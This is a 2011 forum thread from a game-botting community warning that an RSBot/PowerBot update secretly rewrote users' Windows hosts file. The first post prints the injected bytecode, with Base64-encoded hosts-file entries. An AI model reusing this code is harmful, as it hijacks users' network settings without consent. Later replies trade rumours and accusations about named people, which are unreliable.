PowerBot Malicious Code Threat

Alaska

2011-05-25 13:17:11

The application 'PowerBot' has recently been updated to execute malicious code on users' systems. It modifies the windows hosts file within the System32 folder, and redirects rsbuddy.com as well as other domains to unofficial servers.

This update was pushed intentionally by the site's owner and is illegal under international laws and treaties. We will be alerting common anti-virus services as well as the site's hosting providers shortly with regard to this issue.

Technical Information

RSBot downloads and executes a 'modscript' file that inserts code into the game client. This was recently updated to contain the following malicious code section:

new java/lang/String
"QzpcV2luZG93c1xTeXN0ZW0zMlxkcml2ZXJzXGV0Y1xob3N0cw=="
org/rsbot/util/Base64.decodeBase64(Ljava/lang/String;)[B
new java/io/FileWriter
new java/io/BufferedWriter

new java/lang/String
"DQoNCjI0Ni4xMzcuOTUuMjI1IHJzYnVkZHkuY29tDQoyNDYuMTM3Ljk1LjIyNSB3d3cucnNidWRkeS5jb20NCjI0Ni4xMzcuOTUuMjI1IHNjcmlwdHMucnNidWRkeS5jb20NCjE5My4xODQuMjIxLjEzMyBjZG4ucnNidWRkeS5jb20NCjE5My4xODQuMjIxLjEzMyByc2J1ZGR5LWFwaS5nb29nbGVjb2RlLmNvbQ=="
org/rsbot/util/Base64.decodeBase64(Ljava/lang/String;)[B

java/io/BufferedWriter.write(Ljava/lang/String;)V
java/io/BufferedWriter.close()
Hosts file location:
C:\Windows\System32\drivers\etc\hosts
If anyone with programming experience would like to inspect the malicious code the file can be found on the official RSBot SVN (line 1550). I have also provided a cached version of the hook data available for download in case the SVN entry is removed.

Also, He put code within the hook data so even if you use an older version it will still execute the malicious code on your computer.

I'd avoid using powerbot as it will infect your computer, even with this not putting your accounts in danger who knows what can happen next at that site. They've had so many mishaps lately, I kinda hope this breaks the community there down.. At least that will get rid of some of the bots.

There's a fix for it as well located here - http://shadowscripting.org/forums/viewtopic.php?f=9&t=9968

EDIT: If this is not in a proper section I'm sorry and it'd be nice if a mod would move it for me.

Yet another reason why you shouldn't use powerbot…. Idiots.

A little while ago (about a week, give-or-take), LastCoder was banned from Powerbot. In his final time as an admin, he altered the modscript* to also edit everybody's hosts file. For those that don't know, the hosts file (on every windows computer) is used to auto-redirect all connections to whatever the file says they should be. The lines it added to people's hosts file blocked out Powerbot from their computers. This was pointed out, and the file was fixed, along with RSBot gaining a built-in feature to automatically undo any of these tricks in the future. It is worth noting that Jacmob, developer at RSBuddy, was a likely target for Paris' suspicions, due to his extensive knowledge in the ways of modscript. This is just speculation, however, and it's quite possible lastCoder worked alone, choosing to assist RSBuddy through his actions.

Fast-forward a few days. Paris, not knowing how to edit the modscript anyways, uses an editor made for changing already-written code, to alter lastCoder's old modscript file. He simply changed the lines that were edited into every RSBot user's hosts file to block RSBuddy.com, in place of powerbot.org.It is likely this was simply done for revenge. No other changes have been made regarding security, and this is not anything dangerous to user accounts. People who run the RSBot program, regardless of version, are at risk of having their hosts file edited.

Rsbot is open source. Unless you were saying this is because of it being open source, then your just silly.

Does it also modify /etc/hosts..?

Was referring to everything on SRL being open source; Simba, scripts extensions…

I doubt they would've thought about that. :p

EDIT:

@Rich, rsbot is open source as well, as Myles said.

Its not a smear campaign by rsbuddy as this event did take place. And this was going on for days before rsbuddy posted it, so you guys are kind of behind.

The politics behind the java bot communities make me sick. It's like they're all run by 12 year olds.

Can't anyone get along anymore?

The modscript file was uploaded to the RSBot svn repository for around two hours before the announcement was made on RSBuddy. Perhaps you're thinking of the previous modscript issue, where LastCoder blocked access to RSBot's site?

Ok so RSBuddy is violating GPL and getting messed up and in $10k debt if the rumours are true, Powerbot/RSBot is getting infested by account-stealing things and virii and also had legal trouble with Jagex, and Nexus/iBot is getting sued by Jagex but no one heard anything about their case in the past 12 months.
Hf javabots.
So it seems only RiD is succesful at making lots of money without trouble. Cool, they are colour.
Or is Tribot doing fine too? Am I missing any other bots?

Ahaha I now see what Jagex is doing. They are simply letting these big communities self destruct without spending a dime on a law suit or lawyers.

another reason why not to use powerbot :duh: This is why I use 20 Simba because it's nice community and trusted devs and no money issues/competition like this.

Yea thats what I was talking about. Sorry if there was any confusion. Both are still malicious.
